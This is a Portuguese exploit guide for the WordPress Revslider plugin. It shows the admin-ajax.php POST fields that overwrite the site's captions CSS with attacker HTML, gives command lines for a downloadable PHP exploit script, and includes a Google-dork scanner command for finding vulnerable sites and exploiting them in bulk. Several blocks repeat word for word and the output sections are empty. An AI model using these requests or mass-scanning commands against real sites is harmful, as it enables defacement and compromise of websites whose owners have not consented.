WORDPRESS EXPLOIT Revslider
Exploit que possibilita modificação do arquivo HTML da pagina, o plugin Revslider da plataforma CMS Wordpress é bem conhecido por outras brechas de segurança, pois bem dessa vez é possível fazer uma pequena modificação do arquivo get_captions_css.
Enviando a requisição:
Via post com seguintes campos:
array(
array(
"action" => "revslider_ajax_action",
"client_action" => "update_captions_css",
"data" => "_YOU_HTML_ADD_"
);
Dentro no campo data é onde enviamos nosso HTML modificado.
Nossa array post com os dados já previamente preechidos são enviados para seguinte
Nossa array post com os dados já previamente preechidos são enviados para seguinte
URL - POST: http://{target}/wp-admin/admin-ajax.php
Com todo processo terminado podemos verifica se foi modificado o HTML do alvo.
URL - FINAL: http://{target}/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css
USANDO EXPLOIT :
DOWNLOAD: http://pastebin.com/a2LHiD7U
EXECUTE:
-t : SET TARGET.
-f : SET FILE TARGETS.
-p : SET PROXY
Execute:
php exploit.php -t target
php exploit.php -f targets
php exploit.php -t target -p 'http://localhost:9090'
Usando em massa com SCANNER INURLBR:
DOWNLOAD:
https://github.com/googleinurl/SCANNER-INURLBR
COMANDO:
./inurlbr.php --dork 'inurl:admin-ajax.php?action=revslider_show_image -intext:"revslider_show_image"' -s vull.txt -q 1,6 --comand-all 'php inurl_revslider.php -t _TARGET_'
DOWNLOAD: http://pastebin.com/a2LHiD7U
EXECUTE:
-t : SET TARGET.
-f : SET FILE TARGETS.
-p : SET PROXY
Execute:
php exploit.php -t target
php exploit.php -f targets
php exploit.php -t target -p 'http://localhost:9090'
OUTPUT COMAND -t:
OUTPUT COMAND -f targets.txt:
DOWNLOAD:
https://github.com/googleinurl/SCANNER-INURLBR
COMANDO:
./inurlbr.php --dork 'inurl:admin-ajax.php?action=revslider_show_image -intext:"revslider_show_image"' -s vull.txt -q 1,6 --comand-all 'php inurl_revslider.php -t _TARGET_'
OUTPUT: